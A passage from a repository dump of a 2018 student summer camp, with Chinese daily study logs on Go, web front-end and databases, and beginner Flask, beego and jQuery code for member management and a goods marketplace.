对进行的操作前加go,然后main中执行的操作就无需等待这步进行并一步一步进行操作\n 3. channel(主要做goroutine间变量共享和控制的)\n * <- 信道操作符\n ``` Go\n ch <- v // 将 v 发送至信道 ch,此时 <-是发送操作符\n v := <-ch // 从 ch 接收值并赋予 v,此时<-是接收操作符\n ```\n * 信道在使用前必须创建:\n ```Go\n ch := make(chan int)\n ```\n * 先进先出\n 在发送过程中进行的元素值属于完全复制(通道起一个传递作用,接受处即是在发送处的值,如果在发送后接收前对改值进行了操作,也不改变接受处的情况,且变量本身会有变化)\n * 用make函数(内建函数 make 用来为 slice,map 或 chan 类型分配内存和初始化一个对象)\n 4. 死锁(???)\n * 所有的线程或进程都在等待资源的释放\n * 非缓冲信道上如果发生了流入无流出,或者流出无流入,会导致了死锁,Go启动的所有goroutine里的非缓冲信道一定要一个线里存数据,一个线里取数据,要成对\n\n\n7. 
**if err !=nil{}**\n 用于判断是否有error且可以继续进行,并返回error\n\n### 关于认证\n- 当前后端分离时我们会因为同源策略而无法设置cookie和session\n\nto be continued\n明日继续\n" }, { "alpha_fraction": 0.6486486196517944, "alphanum_fraction": 0.7297297120094299, "avg_line_length": 4.4285712242126465, "blob_id": "645a5e6248d3fe1c00cd260ac432d78366e89bc9", "content_id": "d207228dc037ba65145c20384ee4676a0483e854", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 73, "license_type": "no_license", "max_line_length": 13, "num_lines": 7, "path": "/Old-Li883/日报/7.10.md", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "# 7.10\n\n看pyMySQL\n\n明日计划\n\n动手写一些,看相关项目例子" }, { "alpha_fraction": 0.6199332475662231, "alphanum_fraction": 0.6199332475662231, "avg_line_length": 20.84375, "blob_id": "52b9f2e8d3df9dc8a4abe651fc09846a2db66f7d", "content_id": "43108f96bd39c9983a26a6a3ef00d1c1101659a7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2109, "license_type": "no_license", "max_line_length": 101, "num_lines": 96, "path": "/Old-Li883/热身任务代码/member2/mem_views/member_operate.py", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "\"\"\"\n视图函数\n\"\"\"\n\nfrom mem_views import app\nfrom flask import request, make_response\nfrom model.member_operation import mem_login, mem_register, find_no_register, group_member\nfrom model.member_operation import add_new_member, delete_member, change_member, find_all, mem_logout\n\n\[email protected]('/login', methods=['post'])\ndef login():\n \"\"\"\n member login\n \"\"\"\n\n data = request.get_json()\n id = data['id']\n password = data['password']\n return mem_login(id, password)\n\n\[email protected]('/register', methods=['post'])\ndef registered():\n \"\"\"\n member register\n \"\"\"\n\n data = request.get_json()\n id = data['id']\n password = data['password']\n name = data['name']\n email = data['email']\n groups = 
data['group']\n return mem_register(id, password, name, email, groups)\n\n\[email protected]('/no_register')\ndef no_register():\n return find_no_register()\n\n\[email protected]('/add_member', methods=['post'])\ndef add_member():\n data = request.get_json()\n id = data['id']\n password = data['password']\n name = data['name']\n email = data['email']\n groups = data['group']\n status = data['status']\n return add_new_member(id, password, name, email, groups, status)\n\n\[email protected]('/de_member', methods=['post'])\ndef de_member():\n data = request.get_json()\n id = data['id']\n return delete_member(id)\n\n\[email protected]('/cha_member', methods=['post'])\ndef cha_member():\n data = request.get_json()\n id = data['id']\n password = data['password']\n name = data['name']\n email = data['email']\n groups = data['group']\n return change_member(id, password, name, email, groups)\n\n\[email protected]('/fi_all')\ndef fi_all():\n return find_all()\n\n\[email protected]('/gro_member', methods=['post'])\ndef gro_member():\n data = request.get_json()\n groups = data['group']\n return group_member(groups)\n\n\[email protected]('/logout')\ndef logout():\n id = request.cookies.get(\"id\")\n return mem_logout(id)\n\n\[email protected](\"/delete_cookie\")\ndef delete_cookie():\n \"\"\"删除cookie\"\"\"\n resp = make_response(\"delete cookie ok\")\n resp.delete_cookie('id')\n return resp\n" }, { "alpha_fraction": 0.7121211886405945, "alphanum_fraction": 0.7121211886405945, "avg_line_length": 11.045454978942871, "blob_id": "5dd252eadfefea977464e11b6c96209e04222221", "content_id": "27f87073f94183720a9c75f4be89a26b2cda2c3d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Go", "length_bytes": 286, "license_type": "no_license", "max_line_length": 24, "num_lines": 22, "path": "/jackwener/server/mall/models/json.go", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "package models\n\n// 定义了返回的统一的Json格式\n\ntype UserJson 
struct {\n\tUser User\n\tStatus int\n\tMessage string\n}\n\ntype GoodJson struct {\n\tGood []Good\n\tStatus int\n\tMessage string\n\tUrl string\n}\n\ntype SearchJson struct {\n\tContent []string\n\tStatus int\n\tMessage string\n}" }, { "alpha_fraction": 0.7735849022865295, "alphanum_fraction": 0.8301886916160583, "avg_line_length": 16.66666603088379, "blob_id": "326effa107231219df3c035512bdae1f64deffad", "content_id": "1c8f1cfb9587257d56ccc954dd7203d3488e51ef", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 141, "license_type": "no_license", "max_line_length": 42, "num_lines": 3, "path": "/jackwener/日报/7.18.md", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "# 7.18日报\n\n今天没写什么东西,主要围绕着项目的实现想大概的实现,查资料,后面就可以开始实际动手了\n" }, { "alpha_fraction": 0.7884615659713745, "alphanum_fraction": 0.7884615659713745, "avg_line_length": 16.33333396911621, "blob_id": "53d7d126d56f9f4101e6f57a7defda54f9f9d77e", "content_id": "fbc3affeb663b0dad96e50ef2c4fd24c90171cf6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 146, "license_type": "no_license", "max_line_length": 45, "num_lines": 3, "path": "/jackwener/server/README.md", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "# 练手\n\n基本做完了,经过了基本的重构,过了最基础的测试,没有健壮性(我很信任用户的输入,手动滑稽)\n" }, { "alpha_fraction": 0.7786885499954224, "alphanum_fraction": 0.7896174788475037, "avg_line_length": 16.4761905670166, "blob_id": "b6ff81d3d9d3339709eaa28ecb8b4d1099009bde", "content_id": "09747e57e3d1bcd85a22ccc73c03f251444e206c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 842, "license_type": "no_license", "max_line_length": 96, "num_lines": 21, "path": "/jackwener/日报/7.7.md", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "# 文杰7.7日报\n\n## 
早上\n\n早上内容主要是学习go语言,看《go程序设计语言》这本书,主要是学习go语言基础语法,还有些特性内容(?)defer,匿名(函数式),异常(recover+panic+defer),方法,接口\n\n遇到的问题:\n\n1. defer()的坑,return函数不是原子操作,是赋值+ret。defer是按栈顺序压入然后弹出,弹出时间是赋值和ret之间。\n\nand so on(forget)\n\n疑惑: 总觉得自己是不是看的太慢了,急了导致学的东西忘的快,容易出问题,理解不深刻,稳点又怕是不是自己太菜学不动。\n\n## 下午\n\n看go web编程这本书,因为之前没怎么做过web,感觉速度还是比较慢的,另外google各种东西花的时间也比较多\n\n## 晚上\n\n摸鱼睡觉了2个小时,然后在动手尝试练手的任务" }, { "alpha_fraction": 0.38231196999549866, "alphanum_fraction": 0.3927576541900635, "avg_line_length": 34.92499923706055, "blob_id": "a5ccdfd7121b5b79921ba8d45d8121555442a520", "content_id": "391877fa171d8792d302c199d7ecc41f5bd32969", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 1436, "license_type": "no_license", "max_line_length": 79, "num_lines": 40, "path": "/Old-Li883/mall/js/login.js", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "$(document).ready(function () {\n $(\"#submit\").click(function () {\n value = $(\"input:radio[name='who']:checked\").val();\n id = $(\"#id\").val();\n password = $('#password').val();\n jdata = { \"id\": id, \"password\": password };\n $.ajax({\n url: '/api/login?status=' + value,\n data: JSON.stringify(jdata),\n type: 'post',\n dataType: 'json',\n headers: {\n Accept: \"application/json\",\n \"Content-Type\": \"application/json\"\n },\n processData: false,\n cache: false\n }).done(function (data, status) {\n if (data['status'] == 200) {\n alert(\"degnluchegngong\");\n }\n else if (data['status'] == 403) {\n $(\"p\").remove(\"#note\");\n $(\"p\").append(\"<p id='note'>you have login</p>\");\n }\n else if (data['status'] == 400) {\n $(\"p\").remove(\"#note\");\n $(\"p\").append('<p id=\"note\">you have not been identified</p>');\n }\n else if (data['status'] == 401) {\n $(\"p\").remove(\"#note\");\n $(\"p\").append('<p id=\"note\">password wrong</p>');\n }\n else if (data['status'] == 402) {\n $(\"p\").remove(\"#note\");\n $(\"p\").append('<p id=\"note\">id 
wrong</p>');\n }\n });\n });\n});" }, { "alpha_fraction": 0.7648766040802002, "alphanum_fraction": 0.7648766040802002, "avg_line_length": 45, "blob_id": "3466a6f6f1bf514f63ae79564b8b45e5bf7d6f58", "content_id": "b90d7cff8038af765d027924ad4c99fc48ca637c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Go", "length_bytes": 689, "license_type": "no_license", "max_line_length": 106, "num_lines": 15, "path": "/jackwener/server/练手/routers/admin.go", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "package routers\n\nimport (\n\t\"hello/controllers\"\n\t\"github.com/astaxie/beego\"\n)\n\nfunc AdminInit() {\n\tbeego.Router(\"/manager/apply\", &controllers.UserController{}, `get:ListApply;post:UpdateApply`)\n\tbeego.Router(\"/manager/user\", &controllers.UserController{}, `get:UserList`)\n\tbeego.Router(\"/manager/user/add\", &controllers.UserController{}, `get:PageUserAdd;post:UserAdd`)\n\tbeego.Router(\"/manager/user/delete\", &controllers.UserController{}, `get:PageUserDelete;post:UserDelete`)\n\tbeego.Router(\"/manager/user/update\", &controllers.UserController{}, `get:PageUserUpdate;post:UserUpdate`)\n\tbeego.Router(\"/manager/user/group\", &controllers.UserController{}, `get:PageGroupList;post:GroupList`)\n}" }, { "alpha_fraction": 0.6248244643211365, "alphanum_fraction": 0.6374613642692566, "avg_line_length": 21.111801147460938, "blob_id": "72749079dc5fed24f967f674043be938f4b88e98", "content_id": "d159c85dc9bfe5ca8a9dd3552067ac1ab78a2242", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Go", "length_bytes": 3727, "license_type": "no_license", "max_line_length": 100, "num_lines": 161, "path": "/Shixiaoyanger/market/models/Goods.go", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "package models\n\nimport (\n\t\"time\"\n\t\"github.com/astaxie/beego\"\n\t\"github.com/astaxie/beego/orm\"\n\t\"fmt\"\n\n\n\n)\ntype Goodses []Goods\n\ntype Goods 
struct{\n\tId \t\t int64 //\t`json:\"id\"`\n\tGoodsname \t string\t\t`json:\"goodsname\"`\t\n\tCategory \t string \t`json:\"category\"`\n\tPosition \t string\t\t`json:\"position\"`\n\tIntroduction string\t\t`json:\"introduction\"`\n\tTitle string\t\t`json:\"title\"`\n\tPrice int64\t\t`json:\"price\"`\n\tGoodviews int64\t\t`json:\"goodviews\"`\n\tViewtime int64\t\t`json:\"viewtime\"`\n}\n\n//locate goods by goodsname\nfunc Readgoods(goods *Goods) error{\n\to := orm.NewOrm()\n\tqs := o.QueryTable(\"goods\")\n\terr := qs.Filter(\"goodsname\",goods.Goodsname).One(&goods)\n\treturn err\n\t//err == nil goodsname has existed\n\t//err!= nil .....not exist\n\n}\n\n//添加商品\nfunc Addgoods(goods *Goods) (bool, error){\n\to := orm.NewOrm()\n\terr := Readgoods(goods)\n\tif err == nil{\n\t\treturn false, err //goodsname has existed\n\t}\n\t_,err =o.Insert(goods)\n\tif err != nil{\n\t\treturn false, err //faild to insert\n\t}\n\treturn true, nil\n}\n//删除商品\nfunc Deletegoods(goods *Goods) error {\n\to := orm.NewOrm()\n\t_,err := o.Delete(goods)\n\tif err!= nil{\n\t\treturn err\n\t}\n\treturn nil\n}\n\nfunc Updategoods(goods *Goods) error{\n\to := orm.NewOrm()\n\terr := Readgoods(goods)\n\tif err != nil{\n\t\treturn err//not exist\n\t}\n\t_,err =o.Update(goods,\"views\",\"viewtime\")\n\treturn err //update success\n}\n//浏览量+1\nfunc IncreGoodsViews(goods *Goods) {\n\to := orm.NewOrm()\n\tgoods.Goodviews += 1\n\to.Update(goods,\"goodviews\")\n}\nfunc UpadateViewtime(goods *Goods){\n\to := orm.NewOrm()\n\n\t\t // 获取当前(当地)时间\n\t\t t := time.Now()\n\t\t // 获取0时区时间\n\t\t t = time.Now().UTC()\n\t\t fmt.Println(t)\n\t\t // 获取当前时间戳\n\t\t timestamp := t.Unix()\n\t\t fmt.Println(timestamp)\n\t\t // 获取时区信息\n\t\t name, offset := t.Zone()\n\t\t fmt.Println(name, offset)\n\t\t // 把时间戳转换为时间\n\t\t currenttime := time.Unix(timestamp+int64(offset), 0)\n\t\t // 格式化时间\n\t\t fmt.Println(\"Current time : \", currenttime.Format(\"2006-01-02 15:04:05\"))\n\n\tgoods.Viewtime = 
timestamp\n\to.Update(goods,\"viewtime\")\n\n}\n\n/********************查找商品**************************/\nfunc SearchByCategory(category string) (bool, []*Goods){\n\to :=orm.NewOrm()\n\tvar goods []*Goods\n\tfmt.Println(\"123242423\")\n\t_,err := o.QueryTable(\"goods\").Filter(\"category\", category).All(&goods)//All(&goods,\"\",\"\")\n\tfor _,value := range goods{\n\t\tIncreGoodsViews(value)\n\t\tfmt.Println(value)\n\t}\n\tfmt.Println(\"eiwrh98233h9wn\")\n\treturn err!= orm.ErrNoRows, goods\n}\n\nfunc SearchByPosition(position string) (bool, []*Goods){\n\to :=orm.NewOrm()\n\tvar goods []*Goods\n\n\tnum,err := o.QueryTable(\"goods\").Filter(\"position\", position).All(&goods)\n\tfmt.Println(\"返回数据条数\",num,)\n\tfor _,value := range goods{\n\t\tIncreGoodsViews(value)\n\t\tUpadateViewtime(value)\n\t\tfmt.Println(value)\n\t}\n\treturn err!= orm.ErrNoRows, goods\n}\n\nfunc SearchById(id string) (bool, Goods){\n\to :=orm.NewOrm()\n\tvar goods Goods\n\terr := o.QueryTable(\"goods\").Filter(\"id\", id).One(&goods)\n\tIncreGoodsViews(&goods)\n\tUpadateViewtime(&goods)\n\treturn err!= orm.ErrNoRows, goods\n}\n\n/********************热门查询、最新查询 *******************************/\n//热门查询\nfunc PopularSearch() (error,[]*Goods){\n\tvar goods []*Goods\n\t _,err:= orm.NewOrm().Raw(\"SELECT * from goods order by goodviews desc limit 4\" ).QueryRows(&goods)\n\t if err != nil{\n\t\t beego.Error(err)\n\t\t fmt.Println(\"失败\")\n\t }\n\tfmt.Print(\"GJJH\",goods)\n\n\treturn err, goods\n}\n//最新查询\nfunc LatestSearch() (error, []*Goods){\n\tvar goods []*Goods\n\t _,err:= orm.NewOrm().Raw(\"SELECT * from goods order by viewtime desc limit 4\" ).QueryRows(&goods)\n\t if err != nil{\n\t\t beego.Error(err)\n\t\t fmt.Println(\"失败\")\n\t }\n\tfmt.Print(\"dsfsdfs\",goods)\n\n\treturn err, goods\n\n}\n\n" }, { "alpha_fraction": 0.4444444477558136, "alphanum_fraction": 0.6111111044883728, "avg_line_length": 5, "blob_id": "2e07fa7fc5f15996d4a3469acf1c211a9169998b", "content_id": 
"eb382b5c84afbde265aa9f82ed1fc0f8621c38fa", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 36, "license_type": "no_license", "max_line_length": 9, "num_lines": 3, "path": "/jackwener/日报/7.20.md", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "# 7.21\n\n生病发烧,修养一天\n" }, { "alpha_fraction": 0.7777777910232544, "alphanum_fraction": 0.8034188151359558, "avg_line_length": 15.714285850524902, "blob_id": "8ed16430b474a5170ab30f5ff0cadbefcf09b0b7", "content_id": "9e7e0c28168ec21b5996be26f3262e13692d6ccb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 283, "license_type": "no_license", "max_line_length": 44, "num_lines": 7, "path": "/jackwener/日报/7.13.md", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "# 7.13日报\n\n早上看session部分知识,实现了下,没能实现,最后删+注释\n\n下午和晚上做了几个功能,不过管理员批准申请注册者和删除注册者差个前端post id的方法\n\n晚上听了赵澜的讲解后,感觉自己完全搞错路了......\n" }, { "alpha_fraction": 0.7675158977508545, "alphanum_fraction": 0.7834395170211792, "avg_line_length": 12.083333015441895, "blob_id": "bdbfbbdee027febea83b50997803009577098aa0", "content_id": "410d177172aed413b12b5a3c46784b4a8c848f09", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 622, "license_type": "no_license", "max_line_length": 54, "num_lines": 24, "path": "/yixiaoer/日报/7.12.md", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "# 7.12日报\n\n## 今日计划\n登陆及注册基本实现\n\n## 完成情况\n* golang处理json数据的编码与解码\n1. 编码先定义json结构体,再使用Marshal方法序列化\n2. 
解码\n * 先定义结构\n * 调用Unmarshal方法序列化\n * 再通过断言可以访问数据(实现不成功otz)\n\n\n* login/signup等页面的功能实现通过pattern的不同来完成\n* 表单中radio的value数据的获取\n* postData函数的位置?表单还没有信息就传输?➡️所以js要放在一个函数里,onclick再进行操作\n\n\n\n\n又是什么都并没有实现的一天QAQ\n明日继续\nto be continued\n" }, { "alpha_fraction": 0.851578950881958, "alphanum_fraction": 0.8736842274665833, "avg_line_length": 49.05263137817383, "blob_id": "0b41f41a741d894410ef3b6295b65258cd5a88ed", "content_id": "61733ec72813f039f8c49411d57746702837fecd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2696, "license_type": "no_license", "max_line_length": 261, "num_lines": 19, "path": "/jackwener/日报/总结.md", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "# 夏令营的总结\n\n> 时间可以说过的非常快了,20天转眼就没了\n\n很感谢冰岩能给这个机会参加这次的夏令营,并不是那种客气中的感谢,这次夏令营对于我来说意义可以说非常大吧。\n\n1. 知道了应该怎么去实践性学习| 整个大一应该说过的非常浑浑噩噩,感觉也没有过多的玩,但是总是感觉不知道该干什么,想学计算机知识,却又像个无头苍蝇到处撞,不知道怎么做些事情,不知道怎么正确的实践,说起来也好笑,都知道实践重要,但是又缺少那一下点拨,不知道怎么做,那些已经入门或者是进阶的人很难理解这种困惑,这次夏令营算是给了我个机会完整的体验了这种学习。现在想起来,如果早有机会的,或许自己根本也就不会走了很多让自己懊悔的弯路。\n\n2. 体验了一次好的经历| 这20天做的东西现在回过头来看可以说相当差了,做了很多无用功(也可以说是跳了很多坑),但是整个完成任务的流程体验给我非常好,即使我一天花了很多时间,结果在晚上写日报时写不出什么,我也仍然很享受这种过程。\n\n3. 习惯去解决问题| 我身上的很多习惯都不好,我自己是非常清楚的,我不喜欢解决问题,害怕麻烦,容易被困难打击的失去做下去的动力,大一的困局很多都源于此,没能去做新的尝试,一直围着几本书啃。这次夏令营的过程中,虽然还是因为受过一次打击摸过鱼,但相比于以前,已经很让自己满意了,多动脑多自己去解决问题,也是这次的收获之一\n\n4. 忘我远比坚持来的容易| 说实话,我一直很羡慕学校团队的中氛围和能接受到的引导,事实也是我认为的那样。我也还记得大一上学期的一个月,我给自己下了一个目标,把计网自顶向下看完,结果我每天看的甚是煎熬,每天规定看2-3小时,每次都是在煎熬中度过这2-3个小时,一旦看完,整个人如释重负,最后确实是煎熬的看完了,却不知道有什么效果,只能忘光,如果每次学习都是像这次夏令营那样,写着写着,肚子叫了,到了11.30/5.00了,该吃饭了,吃完了继续,感觉很轻松,很快乐,却又是如此容易的把之前难以做到事坚持了下来,还坚持了那么久\n\n5. 冰岩的大佬们人都非常的好,看到了一群很有趣的人。\n\n6. 
以后争取每天都记录自己干了什么,日报挺好的\n\nIn short,这次夏令营非常快乐,也学到了非常多,希望这个暑假多努力,争取能做出冰岩的招新题。" }, { "alpha_fraction": 0.6648199558258057, "alphanum_fraction": 0.6888273358345032, "avg_line_length": 15.661538124084473, "blob_id": "558e59c0409ed2ced2a656e323c8add1bc4e112f", "content_id": "716ff87b9e303fc752a132edfb38b86b363a73c8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1931, "license_type": "no_license", "max_line_length": 109, "num_lines": 65, "path": "/yixiaoer/日报/7.10.md", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "# 2018.7.10日报\n\n## 今日计划\n1. CSS/javascript\n2. mangoBD\n3. echo\n\n\n## 完成情况\n### 关于**CSS**(描述网页的布局)\n* 选择器\n1. id选择器\n CSS中用\"#\",之后用id=\"xxx\"来对应(不要以数字开头\n2. class选择器\n CSS中用\".\",之后用“class=“xxx”来对应\n3. 属性选择器\n* 列表样式(各种属性)\n* 盒模型\n1. 用<div>封装周围的html\n2. 总元素的宽度=宽度+左填充+右填充+左边框+右边框+左边距+右边距\n3. 总元素的高度=高度+顶部填充+底部填充+上边框+下边框+上边距+下边距\n* 定位(顶部,底部,左侧和右侧属性定位)\n* 浮动(往往用于图像)\n\n\n### 关于**javascript**(网页的行为)\n* 只能在 HTML 输出中使用 document.write,如果在文档加载后使用该方法,会覆盖整个文档\n\n* 区分大小写,注释用\"//\"和\"/*\" 、 \" */\",不区分整数和浮点数\n\n* 通过<script>...</script>在hmtl中直接引入这个文件,或者把JavaScript代码放到一个单独的.js文件,并在HTML中通过<script src=\"...\"></script>引入这个文件\n\n* DOM操作(Document Object Model)(文档对象模型)(可以改变页面)\n\n* 作用域\n\n* 变量(数字,字符串)\n1. var来声明\n2. 变量字母开头,大小写敏感\n\n* 函数(前面含function)\n\n* 常见HTML事件\n1. onchange HTML 元素改变\n2. onclick 用户点击 HTML 元素\n3. onmouseover 用户在一个HTML元素上移动鼠标\n4. onmouseout 用户从一个HTML元素上移开鼠标\n5. onkeydown 用户按下键盘按键\n6. onload 浏览器已完成页面的加载\n\n* Fetch API\n1. 提供了一个获取资源的接口,核心在于对HTTP接口的抽象(实现了请求响应等方法)\n2. 
传给后台数据,再then,再返回\n\n### 关于**mangoBD**\n* 后台进行,通过js传json获取数据,然后根据数据进行增(sign up),查(login)\n(数据库的操作)\n\n\n### 关于**echo**\n* cookie认证\n\n\nto be continued\n明日继续...\n" }, { "alpha_fraction": 0.6904761791229248, "alphanum_fraction": 0.761904776096344, "avg_line_length": 7.400000095367432, "blob_id": "e8fcf9f69cbdb054e6058f2f024f4476e2bc4093", "content_id": "c129943a7b10ff2b60611d6cac47970408d6d432", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 88, "license_type": "no_license", "max_line_length": 19, "num_lines": 5, "path": "/jackwener/日报/7.22.md", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "# 7.22日报\n\n看了些前端知识,关于jquery和js\n\n继续写任务,测试接口\n" }, { "alpha_fraction": 0.5446478128433228, "alphanum_fraction": 0.5812534689903259, "avg_line_length": 18.180850982666016, "blob_id": "b18c3a64643cdb26eec44b06b7998f095bf5419e", "content_id": "56a9796caf8a4feba4c01e57d11e7a60ae30cd37", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 3283, "license_type": "no_license", "max_line_length": 81, "num_lines": 94, "path": "/yixiaoer/日报/7.6.md", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "# 2018.7.6日报\n\n## 今日计划\n1. markdown\n2. 语言(Go)的学习\n3. 涉及知识的学习\n\n\n## 完成情况\n### 关于markdown\n* 了解markdown常用语法\n\n\n### 关于Go\n依据*Go官方中文教程*结合*官方链接*,*语言规范*进行了解与学习**\n* 某个名称在包外是否可见,就取决于其首个字符是否为大写字母\n\n* 关于import导入\n1. 直接用import导入包\n ``` Go\n import \"fmt\"\n ```\n 在多个包的情况下\n ``` Go\n import (\n \"fmt\"\n \"math\"\n )\n ```\n2. 用别名导入(或直接用点)\n ``` Go\n import a \"fmt\"//之后需要输入fmt的地方可以用a代替\n \n ```\n3. 非常迷的unused import\n 没有用的包直接导入不允许,可以加“_”强行导入\n\n* 关于函数\n1. 形参当有类型一致时,除最后一个必须标明外,其他可省\n2. 可以多值返回\n3. 声明变量(=赋值,:=声明并赋值(这种简短的声明只能在函数内部使用)\n4. 方法即函数,方法只是个带接受者参数的函数\n\n* 特殊常量iota\n1. 
默认值为0,并逐步增(就算没有再次出现,每步都会增1,遇到一个const关键字时,才会被重置为0)\n 同一行,只计算一次\n ``` Go\n const (\n i, j,k = iota, iota, iota //输出i,j,k显示都是0\n )\n ```\n ``` Go\n const (\n a=iota //iota为0\n b=5 //iota为1\n c=iota //iota为2\n )\n const (\n d=4 //再次遇到const,iota为0\n e=iota //iota为1\n f=7\n ) //a,b,c,d,e,f输出是0,5,2,4,1,7\n ```\n2. 与<<什么的相结合\n\n* 关于流程控制语句\n1. type switch(取值不必为整数)\n2. for是唯一循环\n *for-select*\n \n\n* 函数闭包(类似C的递归\n* defer语句(先进后出,方便关闭)\n 当一个函数中存在多个defer语句时,它们携带的表达式语句的执行顺序一定是它们的出现顺序的倒序\n \n* 结构体\n1. 无论是数组还是指针都用\".\"来访问\n2. 不可用来比较大小,但可用来判断是否相等(此时逐项进行判断,相同即是项的顺序、名称、类型、标签都相同)\n\n* go语言切片(动态)(由 len() 获取长度,cap() 可以测量切片最长可以达到多少))\n1. go的一个数组变量表示整个数组,它不像c语言的数组是指向第一个元素的指针\n2. 切片通过两个下标来界定,即一个上界和一个下界(下界默认值为0),a[low : high],会选择一个半开区间,包括第一个元素,但排除最后一个元素\n ``` Go\n a := [6]int{2, 3, 5, 7, 11, 13}\n var s []int = a[1:4] // [1:4]则会选择数组a中下标为1,2,3的3个数;则若将b输出,b依次是3,5,7\n ```\n3. 用make函数定义func make([]T, len, cap) []T\n4. append( )函数增加之后切片容量是之前的2倍\n\n### 关于认证(???)\n- Cookie就是由服务器发给客户端的特殊信息,而这些信息以文本文件的方式存放在客户端,然后客户端每次向服务器发送请求的时候都会带上这些特殊的信息\n- session数据放在服务器上\nto be continued\n晚上继续...\n" }, { "alpha_fraction": 0.38999998569488525, "alphanum_fraction": 0.4300000071525574, "avg_line_length": 4.941176414489746, "blob_id": "778f581f12afa9caf19e8645b2c20d40b46a313f", "content_id": "e157aa0e05edb3669d717ea7b6a9f92807dc3fca", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 164, "license_type": "no_license", "max_line_length": 13, "num_lines": 17, "path": "/Shixiaoyanger/日报/7.9.md", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "# 7.9日报\n**上午**\n---\nGo语言入门:基本语法\n\n---\n\n## **下午**\n\n1.Go语言入门:基本语法\n2.Go web学习\n\n\n---\n## **晚上**\n\n分享交流" }, { "alpha_fraction": 0.5759162306785583, "alphanum_fraction": 0.7041884660720825, "avg_line_length": 19.052631378173828, "blob_id": "e3590f4fde337d07d037f9f70997a51b543eceed", "content_id": "94d7433ee5fc4438f67422374f8ba85405e72a60", "detected_licenses": [], "is_generated": false, 
"is_vendor": false, "language": "Markdown", "length_bytes": 556, "license_type": "no_license", "max_line_length": 100, "num_lines": 19, "path": "/Shixiaoyanger/日报/7.7.md", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "# 7.7日报\n**上午**\n---\n社会实践返程\n\n---\n\n## **下午**\n\n1. 学习git相关知识 \n学习资料来源:廖雪峰Git教程(https://www.liaoxuefeng.com/wiki/0013739516305929606dd18361248578c67b8067c8c017b000)\n2. linux 系统目录、文件目录、文件操作等。 \n 学习资料来源:linux菜鸟教程(http://www.runoob.com/linux/linux-tutorial.html)\n\n---\n## **晚上**\n\n数据库MySQL入门,但是没学很多,明天继续。\n学习资料来源:http://wiki.jikexueyuan.com/project/mysql-21-minutes/overview.html\n\n" }, { "alpha_fraction": 0.5, "alphanum_fraction": 0.6428571343421936, "avg_line_length": 6, "blob_id": "b56b5821293b95e6d54a4d22a6b8463c1917f9ab", "content_id": "a78f09a75e69a7f90aae2a17ae13b1025a13afd8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 14, "license_type": "no_license", "max_line_length": 7, "num_lines": 2, "path": "/Old-Li883/日报/7.5.md", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "# 7.5\nexample\n" }, { "alpha_fraction": 0.580563485622406, "alphanum_fraction": 0.5837290287017822, "avg_line_length": 18.993671417236328, "blob_id": "bc96b017ed1c479463f52bf4751526ab9910b3da", "content_id": "9787560c7a460e552c6fee5ddb564f2f0a1ef716", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Go", "length_bytes": 3263, "license_type": "no_license", "max_line_length": 59, "num_lines": 158, "path": "/yixiaoer/server/src/project1/controller/user.go", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "package controller\n\nimport (\n\t\"project/model\"\n\t\"net/http\"\n\t\"time\"\n\t\"github.com/labstack/echo\"\n\t\"fmt\"\n)\n\n//func Request(c echo.Context) (err error) {\n//\tu := new(model.User)\n//\tif err = c.Bind(u); err != nil {\n//\t\treturn\n//\t}\n//\treturn 
